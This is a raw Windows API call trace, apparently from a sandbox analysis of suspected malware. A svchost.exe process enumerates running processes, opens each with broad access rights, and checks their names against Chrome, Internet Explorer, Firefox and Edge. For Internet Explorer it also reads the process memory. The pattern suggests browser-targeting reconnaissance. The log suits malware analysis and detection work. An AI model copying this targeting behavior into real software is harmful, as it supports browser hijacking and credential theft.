	[0205.993] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0205.994] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x2e10
	[0205.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.994] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0205.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.994] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0205.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.994] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0205.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.994] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.995] NtQueryInformationProcess (in: ProcessHandle=0x2e10, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0205.995] ReadProcessMemory (in: hProcess=0x2e10, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0205.995] ReadProcessMemory (in: hProcess=0x2e10, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0205.995] ReadProcessMemory (in: hProcess=0x2e10, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0205.995] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0205.995] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0205.996] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x2e14
	[0205.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.996] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0205.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.996] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.997] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0205.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.997] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.997] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0205.998] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x2e18
	[0205.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.998] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0205.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.998] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.999] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0205.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.999] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.999] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.000] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x2e1c
	[0206.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.000] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.000] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.001] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.001] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.001] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.002] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.003] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x2e20
	[0206.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.003] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.003] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.003] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.004] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.004] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0206.004] CloseHandle (hObject=0x188) returned 1
	[0206.004] Sleep (dwMilliseconds=0x64) 
	[0206.108] GetCurrentProcessId () returned 0x110
	[0206.108] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0206.112] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0206.113] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0206.114] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0206.116] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x2e24
	[0206.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.116] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0206.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.116] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.117] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0206.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.117] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.117] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0206.118] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x2e28
	[0206.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.118] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0206.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.119] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.119] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0206.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.119] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.119] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0206.120] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x2e2c
	[0206.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.120] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0206.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.120] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.121] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0206.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.121] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.121] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0206.122] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x2e30
	[0206.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.122] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0206.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.123] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.123] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0206.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.123] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.124] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0206.124] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2e34
	[0206.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.124] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0206.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.125] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.125] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0206.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.125] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.126] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0206.126] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x2e38
	[0206.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.126] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0206.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.127] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.127] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0206.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.128] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.128] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0206.128] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2e3c
	[0206.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.129] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0206.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.129] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.129] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0206.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.129] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.130] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0206.130] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2e40
	[0206.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.130] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0206.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.131] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.131] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0206.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.131] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.131] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.132] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2e44
	[0206.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.132] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.132] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.133] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.133] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.133] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.134] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x2e48
	[0206.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.134] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.134] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.135] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.135] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.135] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.136] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2e4c
	[0206.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.136] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.136] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.136] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.137] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.137] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.138] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x2e50
	[0206.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.138] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.138] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.138] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.139] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.139] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.140] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x2e54
	[0206.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.140] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.140] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.140] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.141] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.141] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.142] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x2e58
	[0206.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.142] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.142] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.142] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.143] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.143] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.143] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2e5c
	[0206.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.144] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.144] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.144] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.145] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.145] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0206.148] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2e60
	[0206.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.148] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0206.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.148] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.148] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0206.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.149] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.149] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.150] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x2e64
	[0206.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.150] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.150] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.150] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.151] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.151] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0206.152] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x2e68
	[0206.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.152] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.152] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
